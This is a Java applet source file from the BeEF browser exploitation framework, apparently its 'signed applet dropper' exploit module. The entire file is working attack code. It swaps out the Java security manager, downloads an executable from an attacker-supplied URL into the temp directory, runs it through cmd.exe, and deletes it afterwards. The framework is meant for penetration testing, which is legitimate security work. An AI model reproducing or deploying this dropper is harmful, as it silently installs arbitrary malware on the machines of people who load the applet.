beef/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java

/*
 * Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 * Browser Exploitation Framework (BeEF) - http://beefproject.com
 *
 * author: antisnatchor
*/
import java.applet.*;
import java.awt.*;
import java.io.*;
import java.util.*;
import java.net.URL;

public class SignedApplet extends Applet {

    public static String debug = "false";
    public static String bin_url = "";
    public static String bin_path = "";
    public static boolean download = false;

    public void init(){
        bin_url = (String)getParameter("url");
        String bin_rand_name = Long.toString(Math.abs((new Random()).nextLong()), 36);
        bin_path = System.getProperty("java.io.tmpdir") + File.separator + bin_rand_name + ".exe";

        // grab operating system -> not used atm
        // TODO: make the applet compatible also with Linux/OSX
        String os = System.getProperty("os.name").toLowerCase();
        execute();
    }

    public SignedApplet(){
        super();
        SecurityManager sm = new SM();
        System.setSecurityManager(sm);
        return;
    }

    public static boolean download(){
        boolean success = false;
        try{
            URL url = new URL(bin_url);
            InputStream is = url.openStream();
            BufferedInputStream isbuf = new BufferedInputStream(is);
            File bin_out = new File(bin_path);
            OutputStream out = new BufferedOutputStream(new FileOutputStream(bin_out));
            byte[] buf = new byte[1024];
            for (;;){
                int bs = isbuf.read(buf);
                if (bs <= 0) break;
                out.write(buf, 0, bs);
            }
            out.flush();
            out.close();
            is.close();
            success = true;
            return success;
        }catch(Exception e){
            return success;
        }
    }

    public static String execute() {
        String result = "";
        String command = "";
        try{
            boolean downloadOk = download();
            System.out.println("Download [" + downloadOk + "] - bin_path [" + bin_path + "]");
            result = "Download [" + downloadOk + "] - bin_path [" + bin_path + "]";

            if(downloadOk){
                // TODO: make the applet compatible also with Linux/OSX
                command = "cmd.exe /c \"" + bin_path + "\"";
                Process p = Runtime.getRuntime().exec(command);
                p.waitFor();
                /// delete dropped binary
                new File(bin_path).delete();
                result += "\n\nExecution OK.";
            }else{
                //downloading of dropper failed, catch error..
                result = "Download error.";
            }
        }catch (Exception e) {
            result = "Exception!!!: \n";
        }
        return result;
    }
}